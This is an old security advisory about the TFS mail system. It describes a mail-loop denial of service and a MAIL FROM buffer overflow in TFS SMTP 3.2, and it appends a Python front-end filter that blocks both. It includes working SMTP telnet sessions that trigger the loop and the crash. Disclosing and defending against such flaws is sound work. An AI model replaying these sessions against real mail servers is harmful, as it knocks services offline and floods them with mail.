COMMAND
TFS mail system
SYSTEMS AFFECTED
Win9x, NT
PROBLEM
FableMan Noxidus found the following. TFS mail system 4 (working on
earlier versions as well?) makes a FAST loop generating lots of
emails until it is forced to stop by the admin. How to reproduce:
    telnet TARGETSYSTEMRUNNING.TFS.MAIL.GATE.XXX 25
    typing HELO
    typing MAIL FROM:FABLEMAN NOXIDUS
    RCPT TO:FIXYOUR SYSTEM.@TARGETSYSTEMRUNNING.TFS.MAIL.GATE.XXX
    DATA
    Fix you system
    Error found by FableMan Noxidus a #HACK member of IRCNet
    .
    QUIT
That's all. Now the system tries to send to
FIXYOUR SYSTEM.@TARGETSYSTEMRUNNING.TFS.MAIL.GATE.XXX
but that address is wrong, so it generates an error report
and mails it to FABLEMAN NOXIDUS. But because he hasn't included an @,
the report will not go out on the Internet, and then the loop starts:
it keeps generating error reports, and the loop is its destiny.
The speed of error report generation is about 1 or more emails
/sec, so if you start the loop, after 1 hr a lot of email has been
generated... until Windows or NT hangs because of it.
Christophe Lesur added the following. A buffer overflow exists and,
under some circumstances and due to the inherent TFS architecture, it
can be used for spamming. There is a major buffer overflow in TFS
SMTP 3.2. When you connect to the SMTP service on port 25, you
get the TFS PROMPT. After sending the 'helo' command, if you send
a 'MAIL FROM' larger than 128 bytes, you will crash the SMTP
service with a nice protection fault. It's basically a buffer
overflow and this has been fixed in release 4.0. This is the
exploit:
    [clesur@raptor clesur]$ telnet mailhost.victim.com 25
    Trying 1.1.1.1...
    Connected to mailhost.victim.com.
    Escape character is '^]'.
    220 mailhost.victim.com is ready. TFS SMTP Server ver 3.2
    helo
    250 mailhost.victim.com, Hello
    mail from:<ddddddddddddd ... lots of char ... dddddddddddddddd>
    Connection closed by foreign host.
SOLUTION
For these vulnerabilities, TenFour suggests upgrading to a
version greater than 4.0.
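
Where an unpatched gateway has to stay in service, an SMTP front-end can screen for both problems described above. The Python below is an added illustration, not part of the original advisory and not TenFour's code; the function names, the 127-byte command limit (chosen to stay under the 128 bytes reported above) and the simplified address grammar are assumptions.

```python
import re

# Assumption: keep every MAIL FROM line below the 128 bytes the advisory
# reports as crashing TFS SMTP 3.2.
MAX_COMMAND = 127
MAIL_RE = re.compile(r"^MAIL FROM:\s*<([^<>\s]*)>(?:\s+\S+)*$", re.IGNORECASE)
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
# Simplified mailbox grammar (assumption): local-part@at.least.two.labels
MAILBOX_RE = re.compile(r"^[^@\s]+@" + LABEL + r"(?:\." + LABEL + r")+$")


def check_mail_from(line):
    """Return (smtp_code, reverse_path) for one MAIL FROM line, CRLF stripped."""
    if len(line) > MAX_COMMAND:
        return 500, None   # too long: never forwarded to the gateway
    m = MAIL_RE.match(line)
    if not m:
        return 501, None   # no <...>, e.g. "MAIL FROM:FABLEMAN NOXIDUS"
    path = m.group(1)
    if path == "":
        return 250, ""     # null reverse-path: an error report, accept it
    if not MAILBOX_RE.match(path):
        return 553, None   # no "@domain": a report to it could never be delivered
    return 250, path


def on_delivery_failure(reverse_path):
    """Decide what to do when an accepted message cannot be delivered."""
    if reverse_path == "":
        return None        # a failed error report is dropped, never reported again
    # The error report itself carries the null reverse-path (MAIL FROM:<>).
    return {"mail_from": "", "rcpt_to": reverse_path}


def count_reports(reverse_path, limit=1000):
    """Worst case: every delivery fails. Count the error reports generated."""
    n = 0
    msg = on_delivery_failure(reverse_path)
    while msg is not None and n < limit:
        n += 1
        msg = on_delivery_failure(msg["mail_from"])
    return n


if __name__ == "__main__":
    # Constructed sample lines modelled on the two transcripts above.
    for sample in ("MAIL FROM:FABLEMAN NOXIDUS",
                   "mail from:<" + "d" * 200 + ">",
                   "MAIL FROM:<user@example.org>"):
        print(check_mail_from(sample)[0], sample[:40])
```

With these rules the worst case is a single error report per message, because a report that cannot be delivered is discarded instead of triggering another one.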